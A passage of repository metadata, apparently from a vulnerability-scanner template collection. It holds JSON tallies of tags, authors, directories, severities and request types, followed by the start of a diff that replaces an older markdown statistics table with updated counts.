opsview","count":1},{"name":"microcomputers","count":1},{"name":"unauthenticated","count":1},{"name":"binaryedge","count":1},{"name":"webpconverter","count":1},{"name":"qualcomm","count":1},{"name":"bitrise","count":1},{"name":"trilium","count":1},{"name":"remkon","count":1},{"name":"ptr","count":1},{"name":"tugboat","count":1},{"name":"web3storage","count":1},{"name":"hivemanager","count":1},{"name":"hanming","count":1},{"name":"xenmobile","count":1},{"name":"droneci","count":1},{"name":"aniapi","count":1},{"name":"mofi","count":1},{"name":"commscope","count":1},{"name":"roundcube","count":1},{"name":"ocs-inventory","count":1},{"name":"raspberrymatic","count":1},{"name":"woody","count":1},{"name":"gsoap","count":1},{"name":"arl","count":1},{"name":"guppy","count":1},{"name":"mpsec","count":1},{"name":"ucp","count":1},{"name":"server","count":1},{"name":"serverstatus","count":1},{"name":"rconfig.exposure","count":1},{"name":"myanimelist","count":1},{"name":"viaware","count":1},{"name":"sefile","count":1},{"name":"containers","count":1},{"name":"emerson","count":1},{"name":"hunter","count":1},{"name":"i3geo","count":1},{"name":"finereport","count":1},{"name":"hiboss","count":1},{"name":"maccmsv10","count":1},{"name":"activeadmin","count":1},{"name":"iconfinder","count":1},{"name":"omni","count":1},{"name":"openssl","count":1},{"name":"shibboleth","count":1},{"name":"anchorcms","count":1},{"name":"plc","count":1},{"name":"webui","count":1},{"name":"openerp","count":1},{"name":"gerapy","count":1},{"name":"jnoj","count":1},{"name":"meraki","count":1},{"name":"leostream","count":1},{"name":"syncthru","count":1},{"name":"contentful","count":1},{"name":"route","count":1},{"name":"wordcloud","count":1},{"name":"proxykingdom","count":1},{"name":"zap","count":1},{"name":"workresources","count":1},{"name":"ganglia","count":1},{"name":"tinypng","count":1},{"name":"netweaver","count":1},{"name":"buddy","count":1},{"name":"axxonsoft","count":1},{"name":"mappress","count":1},{"name":"telecom","count":1},{"name":"ip2whois","count":1},{"name":"biometrics","count":1},{"name":"owncloud","count":1}],"authors":[{"name":"daffainfo","count":631},{"name":"dhiyaneshdk","count":584},{"name":"pikpikcu","count":329},{"name":"pdteam","count":269},{"name":"geeknik","count":187},{"name":"dwisiswant0","count":169},{"name":"0x_akoko","count":165},{"name":"princechaddha","count":151},{"name":"ritikchaddha","count":137},{"name":"pussycat0x","count":133},{"name":"gy741","count":126},{"name":"arafatansari","count":79},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":60},{"name":"akincibor","count":46},{"name":"gaurang","count":42},{"name":"for3stco1d","count":38},{"name":"philippedelteil","count":36},{"name":"adam crosser","count":30},{"name":"c-sh0","count":26},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"righettod","count":22},{"name":"ffffffff0x","count":22},{"name":"techbrunchfr","count":21},{"name":"edoardottt","count":17},{"name":"cckuailong","count":17},{"name":"pr3r00t","count":15},{"name":"sullo","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"sharath","count":13},{"name":"0ri2n","count":13},{"name":"tenbird","count":13},{"name":"johnk3r","count":12},{"name":"melbadry9","count":12},{"name":"suman_kar","count":12},{"name":"elsfa7110","count":11},{"name":"wdahlenb","count":11},{"name":"cyllective","count":11},{"name":"random-robbie","count":11},{"name":"dogasantos","count":11},{"name":"hackergautam","count":10},{"name":"tess","count":10},{"name":"nadino","count":10},{"name":"random_robbie","count":10},{"name":"alph4byt3","count":10},{"name":"meme-lord","count":10},{"name":"oppsec","count":9},{"name":"emadshanab","count":9},{"name":"0x240x23elu","count":9},{"name":"aashiq","count":8},{"name":"zh","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"logicalhunter","count":8},{"name":"amit-jd","count":7},{"name":"techryptic (@tech)","count":7},{"name":"caspergn","count":7},{"name":"randomstr1ng","count":7},{"name":"leovalcante","count":7},{"name":"harshbothra_","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"divya_mudgal","count":7},{"name":"pathtaga","count":6},{"name":"evan rubinstein","count":6},{"name":"pentest_swissky","count":6},{"name":"iamnoooob","count":6},{"name":"veshraj","count":6},{"name":"__fazal","count":6},{"name":"forgedhallpass","count":6},{"name":"puzzlepeaches","count":6},{"name":"rootxharsh","count":6},{"name":"_0xf4n9x_","count":6},{"name":"imnightmaree","count":6},{"name":"nullfuzz","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"lu4nx","count":5},{"name":"podalirius","count":5},{"name":"joanbono","count":5},{"name":"xelkomy","count":5},{"name":"nodauf","count":5},{"name":"scent2d","count":4},{"name":"h1ei1","count":4},{"name":"defr0ggy","count":4},{"name":"dolev farhi","count":4},{"name":"tanq16","count":4},{"name":"incogbyte","count":4},{"name":"dadevel","count":4},{"name":"r3naissance","count":4},{"name":"e_schultze_","count":4},{"name":"wisnupramoedya","count":4},{"name":"3th1c_yuk1","count":4},{"name":"splint3r7","count":3},{"name":"z3bd","count":3},{"name":"fyoorer","count":3},{"name":"jarijaas","count":3},{"name":"unstabl3","count":3},{"name":"thomas_from_offensity","count":3},{"name":"atomiczsec","count":3},{"name":"andydoering","count":3},{"name":"mr-xn","count":3},{"name":"emenalf","count":3},{"name":"dudez","count":3},{"name":"powerexploit","count":3},{"name":"supras","count":3},{"name":"alifathi-h1","count":3},{"name":"binaryfigments","count":3},{"name":"ph33r","count":3},{"name":"f1tz","count":3},{"name":"_generic_human_","count":3},{"name":"lark-lab","count":3},{"name":"davidmckennirey","count":3},{"name":"shifacyclewala","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"gitlab red team","count":3},{"name":"johnjhacking","count":3},{"name":"lucasljm2001","count":3},{"name":"dr0pd34d","count":3},{"name":"ekrause","count":3},{"name":"its0x08","count":3},{"name":"whoever","count":3},{"name":"mavericknerd","count":3},{"name":"sushantkamble","count":3},{"name":"me9187","count":3},{"name":"impramodsargar","count":3},{"name":"shine","count":3},{"name":"fxploit","count":3},{"name":"arcc","count":3},{"name":"hahwul","count":3},{"name":"skeltavik","count":3},{"name":"cocxanh","count":2},{"name":"manas_harsh","count":2},{"name":"0xcrypto","count":2},{"name":"afaq","count":2},{"name":"dheerajmadhukar","count":2},{"name":"raesene","count":2},{"name":"lotusdll","count":2},{"name":"0xrudra","count":2},{"name":"g4l1t0","count":2},{"name":"ree4pwn","count":2},{"name":"666asd","count":2},{"name":"hackerarpan","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"kre80r","count":2},{"name":"convisoappsec","count":2},{"name":"danielmofer","count":2},{"name":"prajiteshsingh","count":2},{"name":"gevakun","count":2},{"name":"y4er","count":2},{"name":"smaranchand","count":2},{"name":"ajaysenr","count":2},{"name":"n-thumann","count":2},{"name":"sy3omda","count":2},{"name":"dahse89","count":2},{"name":"0xprial","count":2},{"name":"paperpen","count":2},{"name":"v0idc0de","count":2},{"name":"nuk3s3c","count":2},{"name":"ambassify","count":2},{"name":"hetroublemakr","count":2},{"name":"geekby","count":2},{"name":"k11h-de","count":2},{"name":"socketz","count":2},{"name":"sbani","count":2},{"name":"kiblyn11","count":2},{"name":"foulenzer","count":2},{"name":"0xnirvana","count":2},{"name":"swissky","count":2},{"name":"huowuzhao","count":2},{"name":"martincodes-de","count":2},{"name":"0xelkomy","count":2},{"name":"fabaff","count":2},{"name":"moritz nentwig","count":2},{"name":"koti2","count":2},{"name":"zomsop82","count":2},{"name":"thezakman","count":2},{"name":"0xsmiley","count":2},{"name":"joshlarsen","count":2},{"name":"dbrwsky","count":2},{"name":"bananabr","count":2},{"name":"github.com/its0x08","count":2},{"name":"0xsapra","count":2},{"name":"brenocss","count":2},{"name":"rafaelwdornelas","count":2},{"name":"z0ne","count":2},{"name":"clarkvoss","count":2},{"name":"cckuakilong","count":2},{"name":"nvn1729","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"redteambrasil","count":2},{"name":"codexlynx","count":2},{"name":"thardt-praetorian","count":2},{"name":"bp0lr","count":2},{"name":"paradessia","count":2},{"name":"joeldeleep","count":2},{"name":"w4cky_","count":2},{"name":"gal nagli","count":2},{"name":"bernardofsr","count":2},{"name":"randomrobbie","count":2},{"name":"vsh00t","count":2},{"name":"ehsahil","count":2},{"name":"luci","count":2},{"name":"badboycxcc","count":2},{"name":"myztique","count":2},{"name":"r12w4n","count":2},{"name":"amsda","count":2},{"name":"uomogrande","count":2},{"name":"mohammedsaneem","count":2},{"name":"pxmme1337","count":2},{"name":"taielab","count":2},{"name":"bing0o","count":2},{"name":"parth","count":2},{"name":"nkxxkn","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"udit_thakkur","count":2},{"name":"d4vy","count":2},{"name":"vavkamil","count":2},{"name":"bsysop","count":2},{"name":"x1m_martijn","count":2},{"name":"ooooooo_q","count":1},{"name":"push4d","count":1},{"name":"0xceba","count":1},{"name":"compr00t","count":1},{"name":"blckraven","count":1},{"name":"bad5ect0r","count":1},{"name":"_c0wb0y_","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"lixts","count":1},{"name":"elitebaz","count":1},{"name":"anon-artist","count":1},{"name":"schniggie","count":1},{"name":"prettyboyaaditya","count":1},{"name":"mubassirpatel","count":1},{"name":"dawid-czarnecki","count":1},{"name":"majidmc2","count":1},{"name":"soyelmago","count":1},{"name":"sherlocksecurity","count":1},{"name":"w0tx","count":1},{"name":"x6263","count":1},{"name":"rodnt","count":1},{"name":"pdp","count":1},{"name":"xeldax","count":1},{"name":"hexcat","count":1},{"name":"liquidsec","count":1},{"name":"tirtha_mandal","count":1},{"name":"elouhi","count":1},{"name":"2rs3c","count":1},{"name":"djoevanka","count":1},{"name":"arm!tage","count":1},{"name":"0xrod","count":1},{"name":"izn0u","count":1},{"name":"shreyapohekar","count":1},{"name":"retr02332","count":1},{"name":"luskabol","count":1},{"name":"rubina119","count":1},{"name":"iampritam","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"skylark-lab","count":1},{"name":"miroslavsotak","count":1},{"name":"nielsing","count":1},{"name":"elder tao","count":1},{"name":"yashanand155","count":1},{"name":"ringo","count":1},{"name":"rotemreiss","count":1},{"name":"jteles","count":1},{"name":"amnotacat","count":1},{"name":"undefl0w","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"_darrenmartyn","count":1},{"name":"un-fmunozs","count":1},{"name":"mah3sec_","count":1},{"name":"brabbit10","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"thevillagehacker","count":1},{"name":"aaronchen0","count":1},{"name":"absshax","count":1},{"name":"noobexploiter","count":1},{"name":"justmumu","count":1},{"name":"mantissts","count":1},{"name":"phyr3wall","count":1},{"name":"tirtha","count":1},{"name":"jiheon-dev","count":1},{"name":"hakluke","count":1},{"name":"tim_koopmans","count":1},{"name":"ahmed abou-ela","count":1},{"name":"marcos_iaf","count":1},{"name":"c3l3si4n","count":1},{"name":"kr1shna4garwal","count":1},{"name":"s0obi","count":1},{"name":"b4uh0lz","count":1},{"name":"natto97","count":1},{"name":"shelld3v","count":1},{"name":"husain","count":1},{"name":"danigoland","count":1},{"name":"droberson","count":1},{"name":"noraj","count":1},{"name":"thesubtlety","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"iphantasmic","count":1},{"name":"furkansayim","count":1},{"name":"elmahdi","count":1},{"name":"unkl4b","count":1},{"name":"ph33rr","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"rotembar","count":1},{"name":"borna nematzadeh","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"0h1in9e","count":1},{"name":"geraldino2","count":1},{"name":"nytr0gen","count":1},{"name":"ola456","count":1},{"name":"jcockhren","count":1},{"name":"apt-mirror","count":1},{"name":"p-l-","count":1},{"name":"aringo","count":1},{"name":"davidfegyver","count":1},{"name":"hakimkt","count":1},{"name":"nerrorsec","count":1},{"name":"patralos","count":1},{"name":"fopina","count":1},{"name":"whynotke","count":1},{"name":"evolutionsec","count":1},{"name":"zhenwarx","count":1},{"name":"xshuden","count":1},{"name":"th3.d1p4k","count":1},{"name":"failopen","count":1},{"name":"jbaines-r7","count":1},{"name":"xstp","count":1},{"name":"sickwell","count":1},{"name":"mrcl0wnlab","count":1},{"name":"ptonewreckin","count":1},{"name":"shifacyclewla","count":1},{"name":"noamrathaus","count":1},{"name":"berkdusunur","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"infosecsanyam","count":1},{"name":"zinminphy0","count":1},{"name":"alex","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"mhdsamx","count":1},{"name":"manasmbellani","count":1},{"name":"regala_","count":1},{"name":"screamy","count":1},{"name":"orpheus","count":1},{"name":"yavolo","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"erethon","count":1},{"name":"andysvints","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"0ut0fb4nd","count":1},{"name":"andirrahmani1","count":1},{"name":"micha3lb3n","count":1},{"name":"charanrayudu","count":1},{"name":"nobody","count":1},{"name":"httpvoid","count":1},{"name":"toufik-airane","count":1},{"name":"_harleo","count":1},{"name":"adrianmf","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"daviey","count":1},{"name":"affix","count":1},{"name":"willd96","count":1},{"name":"daffianfo","count":1},{"name":"jbertman","count":1},{"name":"opencirt","count":1},{"name":"akshansh","count":1},{"name":"d0rkerdevil","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"ilovebinbash","count":1},{"name":"petruknisme","count":1},{"name":"yashgoti","count":1},{"name":"kailashbohara","count":1},{"name":"piyushchhiroliya","count":1},{"name":"arjunchandarana","count":1},{"name":"aresx","count":1},{"name":"alexrydzak","count":1},{"name":"arall","count":1},{"name":"fq_hsu","count":1},{"name":"jeya seelan","count":1},{"name":"ling","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"kh4sh3i","count":1},{"name":"co0nan","count":1},{"name":"ok_bye_now","count":1},{"name":"juicypotato1","count":1},{"name":"0xceeb","count":1},{"name":"narluin","count":1},{"name":"lark lab","count":1},{"name":"clment cruchet","count":1},{"name":"arr0way","count":1},{"name":"remonsec","count":1},{"name":"makyotox","count":1},{"name":"vzamanillo","count":1},{"name":"j33n1k4","count":1},{"name":"f1she3","count":1},{"name":"sec_hawk","count":1},{"name":"kiks7","count":1},{"name":"gboddin","count":1},{"name":"lamscun","count":1},{"name":"jrolf","count":1},{"name":"zandros0","count":1},{"name":"miryangjung","count":1},{"name":"jas37","count":1},{"name":"paper-pen","count":1},{"name":"official_blackhat13","count":1},{"name":"vinit989","count":1},{"name":"act1on3","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"bywalks","count":1},{"name":"ohlinge","count":1},{"name":"sicksec","count":1},{"name":"ricardomaia","count":1},{"name":"b0yd","count":1},{"name":"oscarintherocks","count":1},{"name":"coldfish","count":1},{"name":"igibanez","count":1},{"name":"dievus","count":1},{"name":"h4kux","count":1},{"name":"maximus decimus","count":1},{"name":"manuelbua","count":1},{"name":"intx0x80","count":1},{"name":"mesaglio","count":1},{"name":"retr0","count":1},{"name":"fmunozs","count":1},{"name":"wabafet","count":1},{"name":"alperenkesk","count":1},{"name":"mass0ma","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"francescocarlucci","count":1},{"name":"cookiehanhoan","count":1},{"name":"deena","count":1},{"name":"ldionmarcil","count":1},{"name":"true13","count":1},{"name":"hardik-rathod","count":1},{"name":"pratik khalane","count":1},{"name":"bughuntersurya","count":1},{"name":"kurohost","count":1},{"name":"amanrawat","count":1},{"name":"momen eldawakhly","count":1},{"name":"wlayzz","count":1},{"name":"kabirsuda","count":1},{"name":"0xh7ml","count":1},{"name":"alevsk","count":1},{"name":"evan rubinstien","count":1},{"name":"pudsec","count":1},{"name":"florianmaak","count":1},{"name":"philippdelteil","count":1},{"name":"luqmaan hadia","count":1},{"name":"b0rn2r00t","count":1},{"name":"0xtavian","count":1},{"name":"hanlaomo","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"zsusac","count":1},{"name":"bjhulst","count":1},{"name":"dhiyaneshdki","count":1},{"name":"qlkwej","count":1},{"name":"thebinitghimire","count":1},{"name":"jeya.seelan","count":1},{"name":"duty_1g","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"exid","count":1},{"name":"korteke","count":1},{"name":"knassar702","count":1},{"name":"ggranjus","count":1},{"name":"akash.c","count":1},{"name":"rojanrijal","count":1},{"name":"pjborah","count":1},{"name":"streetofhackerr007","count":1},{"name":"furkansenan","count":1},{"name":"harshinsecurity","count":1},{"name":"notnotnotveg","count":1},{"name":"omarkurt","count":1},{"name":"ipanda","count":1},{"name":"notsoevilweasel","count":1},{"name":"ofjaaah","count":1},{"name":"rschio","count":1},{"name":"revblock","count":1},{"name":"kaizensecurity","count":1},{"name":"yuansec","count":1},{"name":"exceed","count":1},{"name":"flag007","count":1},{"name":"1nf1n7y","count":1},{"name":"pry0cc","count":1},{"name":"open-sec","count":1},{"name":"lethargynavigator","count":1},{"name":"osamahamad","count":1},{"name":"exploitation","count":1},{"name":"5up3r541y4n","count":1},{"name":"ahmed sherif","count":1},{"name":"chron0x","count":1},{"name":"0xd0ff9","count":1},{"name":"becivells","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"kareemse1im","count":1},{"name":"calumjelrick","count":1},{"name":"s1r1u5_","count":1},{"name":"tea","count":1},{"name":"sshell","count":1},{"name":"udyz","count":1},{"name":"0xteles","count":1},{"name":"luqman","count":1},{"name":"bartu utku sarp","count":1},{"name":"breno_css","count":1},{"name":"ahmetpergamum","count":1}],"directory":[{"name":"cves","count":1407},{"name":"exposed-panels","count":662},{"name":"vulnerabilities","count":509},{"name":"technologies","count":282},{"name":"exposures","count":275},{"name":"misconfiguration","count":237},{"name":"token-spray","count":230},{"name":"workflows","count":189},{"name":"default-logins","count":103},{"name":"file","count":76},{"name":"takeovers","count":68},{"name":"iot","count":39},{"name":"network","count":37},{"name":"cnvd","count":25},{"name":"miscellaneous","count":24},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"headless","count":7},{"name":"ssl","count":5}],"severity":[{"name":"info","count":1474},{"name":"high","count":1009},{"name":"medium","count":818},{"name":"critical","count":478},{"name":"low","count":225},{"name":"unknown","count":11}],"types":[{"name":"http","count":3858},{"name":"file","count":76},{"name":"network","count":51},{"name":"dns","count":17}]}
diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md
index 202c85dca8..bdea6b2136 100644
--- a/TEMPLATES-STATS.md
+++ b/TEMPLATES-STATS.md
@@ -1,1555 +1,1952 @@
-|         TAG          | COUNT |             AUTHOR             | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
-|----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve                  |  1156 | daffainfo                      |   560 | cves             |  1160 | info     |  1192 | http    |  3187 |
-| panel                |   515 | dhiyaneshdk                    |   421 | exposed-panels   |   523 | high     |   874 | file    |    68 |
-| lfi                  |   461 | pikpikcu                       |   316 | vulnerabilities  |   452 | medium   |   662 | network |    50 |
-| xss                  |   367 | pdteam                         |   262 | technologies     |   255 | critical |   414 | dns     |    17 |
-| wordpress            |   364 | geeknik                        |   179 | exposures        |   204 | low      |   183 |         |       |
-| exposure             |   293 | dwisiswant0                    |   168 | misconfiguration |   197 | unknown  |     6 |         |       |
-| rce                  |   291 | princechaddha                  |   133 | workflows        |   186 |          |       |         |       |
-| cve2021              |   283 | 0x_akoko                       |   130 | token-spray      |   154 |          |       |         |       |
-| tech                 |   271 | gy741                          |   118 | default-logins   |    95 |          |       |         |       |
-| wp-plugin            |   264 | pussycat0x                     |   116 | file             |    68 |          |       |         |       |
-| cve2020              |   197 | madrobot                       |    65 | takeovers        |    67 |          |       |         |       |
-|                      |   188 | zzeitlin                       |    64 | iot              |    38 |          |       |         |       |
-| token-spray          |   154 | idealphase                     |    47 | network          |    35 |          |       |         |       |
-| joomla               |   131 | ritikchaddha                   |    42 | miscellaneous    |    23 |          |       |         |       |
-| config               |   126 | gaurang                        |    42 | cnvd             |    22 |          |       |         |       |
-| cve2018              |   121 | philippedelteil                |    36 | dns              |    17 |          |       |         |       |
-| apache               |   120 | adam crosser                   |    30 | fuzzing          |    12 |          |       |         |       |
-| cve2019              |   118 | ice3man                        |    26 | headless         |     6 |          |       |         |       |
-| cve2010              |   111 | organiccrap                    |    24 | ssl              |     4 |          |       |         |       |
-| default-login        |   110 | c-sh0                          |    23 |                  |       |          |       |         |       |
-| unauth               |   108 | ffffffff0x                     |    22 |                  |       |          |       |         |       |
-| iot                  |   102 | akincibor                      |    20 |                  |       |          |       |         |       |
-| oast                 |    97 | righettod                      |    18 |                  |       |          |       |         |       |
-| login                |    85 | cckuailong                     |    17 |                  |       |          |       |         |       |
-| takeover             |    73 | for3stco1d                     |    16 |                  |       |          |       |         |       |
-| token                |    72 | pr3r00t                        |    15 |                  |       |          |       |         |       |
-| redirect             |    71 | sheikhrishad                   |    15 |                  |       |          |       |         |       |
-| misconfig            |    65 | techbrunchfr                   |    14 |                  |       |          |       |         |       |
-| cve2017              |    64 | r3dg33k                        |    14 |                  |       |          |       |         |       |
-| cve2022              |    63 | milo2012                       |    14 |                  |       |          |       |         |       |
-| sqli                 |    62 | sharath                        |    13 |                  |       |          |       |         |       |
-| ssrf                 |    61 | suman_kar                      |    12 |                  |       |          |       |         |       |
-| file                 |    60 | sullo                          |    12 |                  |       |          |       |         |       |
-| wp                   |    55 | wdahlenb                       |    11 |                  |       |          |       |         |       |
-| network              |    53 | melbadry9                      |    11 |                  |       |          |       |         |       |
-| router               |    52 | cyllective                     |    11 |                  |       |          |       |         |       |
-| oracle               |    50 | nadino                         |    10 |                  |       |          |       |         |       |
-| disclosure           |    45 | alph4byt3                      |    10 |                  |       |          |       |         |       |
-| cve2016              |    45 | meme-lord                      |    10 |                  |       |          |       |         |       |
-| plugin               |    40 | johnk3r                        |    10 |                  |       |          |       |         |       |
-| auth-bypass          |    39 | hackergautam                   |    10 |                  |       |          |       |         |       |
-| cve2014              |    37 | random_robbie                  |    10 |                  |       |          |       |         |       |
-| google               |    36 | edoardottt                     |     9 |                  |       |          |       |         |       |
-| cve2015              |    36 | emadshanab                     |     9 |                  |       |          |       |         |       |
-| cisco                |    35 | dogasantos                     |     9 |                  |       |          |       |         |       |
-| authenticated        |    35 | zh                             |     8 |                  |       |          |       |         |       |
-| logs                 |    33 | that_juan_                     |     8 |                  |       |          |       |         |       |
-| atlassian            |    32 | iamthefrogy                    |     8 |                  |       |          |       |         |       |
-| injection            |    30 | aashiq                         |     8 |                  |       |          |       |         |       |
-| listing              |    30 | harshbothra_                   |     7 |                  |       |          |       |         |       |
-| jira                 |    30 | techryptic (@tech)             |     7 |                  |       |          |       |         |       |
-| traversal            |    29 | logicalhunter                  |     7 |                  |       |          |       |         |       |
-| devops               |    28 | 0x240x23elu                    |     7 |                  |       |          |       |         |       |
-| generic              |    26 | kophjager007                   |     7 |                  |       |          |       |         |       |
-| kubernetes           |    25 | divya_mudgal                   |     7 |                  |       |          |       |         |       |
-| adobe                |    24 | randomstr1ng                   |     7 |                  |       |          |       |         |       |
-| springboot           |    24 | dr_set                         |     7 |                  |       |          |       |         |       |
-| cms                  |    24 | random-robbie                  |     7 |                  |       |          |       |         |       |
-| oss                  |    24 | oppsec                         |     7 |                  |       |          |       |         |       |
-| proxy                |    22 | pathtaga                       |     6 |                  |       |          |       |         |       |
-| cnvd                 |    22 | leovalcante                    |     6 |                  |       |          |       |         |       |
-| sap                  |    22 | iamnoooob                      |     6 |                  |       |          |       |         |       |
-| microsoft            |    21 | rootxharsh                     |     6 |                  |       |          |       |         |       |
-| vmware               |    21 | caspergn                       |     6 |                  |       |          |       |         |       |
-| intrusive            |    21 | __fazal                        |     6 |                  |       |          |       |         |       |
-| debug                |    21 | pentest_swissky                |     6 |                  |       |          |       |         |       |
-| aem                  |    21 | forgedhallpass                 |     6 |                  |       |          |       |         |       |
-| misc                 |    21 | puzzlepeaches                  |     6 |                  |       |          |       |         |       |
-| wp-theme             |    20 | evan rubinstein                |     6 |                  |       |          |       |         |       |
-| service              |    20 | ganofins                       |     5 |                  |       |          |       |         |       |
-| fuzz                 |    20 | _0xf4n9x_                      |     5 |                  |       |          |       |         |       |
-| manageengine         |    19 | xelkomy                        |     5 |                  |       |          |       |         |       |
-| cve2012              |    19 | panch0r3d                      |     5 |                  |       |          |       |         |       |
-| zoho                 |    18 | elsfa7110                      |     5 |                  |       |          |       |         |       |
-| php                  |    18 | imnightmaree                   |     5 |                  |       |          |       |         |       |
-| dns                  |    18 | praetorian-thendrickson        |     5 |                  |       |          |       |         |       |
-| aws                  |    17 | yanyun                         |     5 |                  |       |          |       |         |       |
-| tomcat               |    17 | joanbono                       |     5 |                  |       |          |       |         |       |
-| weblogic             |    17 | lu4nx                          |     5 |                  |       |          |       |         |       |
-| deserialization      |    17 | podalirius                     |     5 |                  |       |          |       |         |       |
-| k8s                  |    16 | defr0ggy                       |     4 |                  |       |          |       |         |       |
-| ibm                  |    16 | nodauf                         |     4 |                  |       |          |       |         |       |
-| struts               |    16 | incogbyte                      |     4 |                  |       |          |       |         |       |
-| gitlab               |    15 | dadevel                        |     4 |                  |       |          |       |         |       |
-| jenkins              |    15 | tess                           |     4 |                  |       |          |       |         |       |
-| dlink                |    15 | wisnupramoedya                 |     4 |                  |       |          |       |         |       |
-| cve2011              |    15 | dolev farhi                    |     4 |                  |       |          |       |         |       |
-| fileupload           |    14 | tanq16                         |     4 |                  |       |          |       |         |       |
-| xxe                  |    14 | e_schultze_                    |     4 |                  |       |          |       |         |       |
-| cve2009              |    14 | h1ei1                          |     4 |                  |       |          |       |         |       |
-| hp                   |    14 | me9187                         |     3 |                  |       |          |       |         |       |
-| android              |    14 | andydoering                    |     3 |                  |       |          |       |         |       |
-| java                 |    14 | shifacyclewala                 |     3 |                  |       |          |       |         |       |
-| api                  |    14 | sushantkamble                  |     3 |                  |       |          |       |         |       |
-| ruijie               |    13 | f1tz                           |     3 |                  |       |          |       |         |       |
-| firewall             |    13 | r3naissance                    |     3 |                  |       |          |       |         |       |
-| camera               |    13 | jarijaas                       |     3 |                  |       |          |       |         |       |
-| cve2013              |    12 | emenalf                        |     3 |                  |       |          |       |         |       |
-| lfr                  |    12 | binaryfigments                 |     3 |                  |       |          |       |         |       |
-| netsweeper           |    12 | z3bd                           |     3 |                  |       |          |       |         |       |
-| rails                |    12 | whoever                        |     3 |                  |       |          |       |         |       |
-| log4j                |    12 | impramodsargar                 |     3 |                  |       |          |       |         |       |
-| nginx                |    12 | johnjhacking                   |     3 |                  |       |          |       |         |       |
-| printer              |    12 | _generic_human_                |     3 |                  |       |          |       |         |       |
-| status               |    12 | unstabl3                       |     3 |                  |       |          |       |         |       |
-| upload               |    11 | yash anand @yashanand155       |     3 |                  |       |          |       |         |       |
-| netgear              |    11 | supras                         |     3 |                  |       |          |       |         |       |
-| graphql              |    11 | github.com/its0x08             |     3 |                  |       |          |       |         |       |
-| cnvd2021             |    11 | mr-xn                          |     3 |                  |       |          |       |         |       |
-| magento              |    11 | fyoorer                        |     3 |                  |       |          |       |         |       |
-| glpi                 |    10 | thomas_from_offensity          |     3 |                  |       |          |       |         |       |
-| grafana              |    10 | 0w4ys                          |     3 |                  |       |          |       |         |       |
-| spring               |    10 | davidmckennirey                |     3 |                  |       |          |       |         |       |
-| jolokia              |    10 | dudez                          |     3 |                  |       |          |       |         |       |
-| backup               |    10 | gitlab red team                |     3 |                  |       |          |       |         |       |
-| auth                 |    10 | arcc                           |     3 |                  |       |          |       |         |       |
-| dell                 |    10 | shine                          |     3 |                  |       |          |       |         |       |
-| fortigate            |    10 | veshraj                        |     3 |                  |       |          |       |         |       |
-| airflow              |    10 | skeltavik                      |     3 |                  |       |          |       |         |       |
-| coldfusion           |    10 | mavericknerd                   |     3 |                  |       |          |       |         |       |
-| github               |     9 | alifathi-h1                    |     3 |                  |       |          |       |         |       |
-| jndi                 |     9 | lark-lab                       |     3 |                  |       |          |       |         |       |
-| mirai                |     9 | yuzhe-zhang-0                  |     3 |                  |       |          |       |         |       |
-| wso2                 |     9 | cocxanh                        |     2 |                  |       |          |       |         |       |
-| fastjson             |     9 | bananabr                       |     2 |                  |       |          |       |         |       |
-| iis                  |     9 | paperpen                       |     2 |                  |       |          |       |         |       |
-| cve2008              |     9 | its0x08                        |     2 |                  |       |          |       |         |       |
-| laravel              |     9 | ajaysenr                       |     2 |                  |       |          |       |         |       |
-| woocommerce          |     9 | smaranchand                    |     2 |                  |       |          |       |         |       |
-| fortinet             |     9 | dahse89                        |     2 |                  |       |          |       |         |       |
-| zabbix               |     9 | 0xcrypto                       |     2 |                  |       |          |       |         |       |
-| ftp                  |     9 | mohammedsaneem                 |     2 |                  |       |          |       |         |       |
-| drupal               |     9 | 0xsapra                        |     2 |                  |       |          |       |         |       |
-| webserver            |     9 | pxmme1337                      |     2 |                  |       |          |       |         |       |
-| windows              |     9 | nkxxkn                         |     2 |                  |       |          |       |         |       |
-| phpmyadmin           |     8 | gal nagli                      |     2 |                  |       |          |       |         |       |
-| metadata             |     8 | nuk3s3c                        |     2 |                  |       |          |       |         |       |
-| audit                |     8 | z0ne                           |     2 |                  |       |          |       |         |       |
-| bypass               |     8 | convisoappsec                  |     2 |                  |       |          |       |         |       |
